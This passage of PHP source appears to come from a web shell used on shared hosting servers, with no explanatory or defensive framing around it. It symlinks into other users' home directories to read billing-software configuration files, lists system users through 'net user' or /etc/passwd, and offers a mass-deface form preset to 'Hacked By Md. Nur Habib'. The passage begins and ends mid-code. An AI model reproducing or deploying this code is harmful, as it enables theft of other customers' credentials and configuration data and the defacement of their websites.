symlink("/" . $_POST['home'] . "/" . $us . '/public_html/hostbills/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/host/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Host/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/supportes/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/hosting/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cart/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/order/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/client/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clients/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cliente/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientes/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billing/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/my/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/secure/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/order/includes/iso4217.php', $r . $us . '..Hostbills');
}
echo "<center>";
echo "<br/>";
echo "<a href='DomDell_Config'>Configuration Files</a>";
echo "</center>";
}
}
} ?>
<?php
if (isset($_POST['us'])) {
if (strtoupper(substr(php_uname(), 0, 3)) === 'WIN') {
echo `net user > users.txt`;
?>
<center><a href='<?php echo "users.txt" ?>'>Users</a></center>
<?php
} else {
?>
<center>
<table border="1" class="users">
<?php
echo "<tr>";
$users = file('/etc/passwd');
foreach ($users as $us) {
$str = explode(":", $us);
echo "<td>" . $str[0] . "\n" . "</td>";
echo "</tr>";
}
?>
</table>
</center>
<?php }
}
if (isset($_POST['mass'])) {
?>
<form method="post">
<center>
Target Folder:<br />
<input type="text" name='file' value="<?php echo getcwd(); ?>" style="background-color: #262626 ;color:white;border: 1px solid blue;width: 300px;padding: 10px"><br />
File:<br />
<input type="text" value="index.php" name="andela" style="background-color: #262626 ;color:white;border: 1px solid blue;width: 300px;padding: 10px"><br />
Script Deface:<br />
<textarea style="background-color:#262626;border: 1px solid blue" name="source" cols="50" rows="5">Hacked By Md. Nur Habib</textarea><br />
<input style="color: white; background-color: black; border: 1px solid blue" type="submit" name="Deface" value='Mass'>
</center>
</form>
<?php }
if (isset($_POST['Deface'])) {
if (!file_exists($_POST['file'])) {
die($_POST['file'] . " Not Found !<br>");
}
if (!is_dir($_POST['file'])) {
die($_POST['file'] . " Is Not A Directory !<br>");
}
@chdir($_POST['file']) or die("Cannot Open Directory");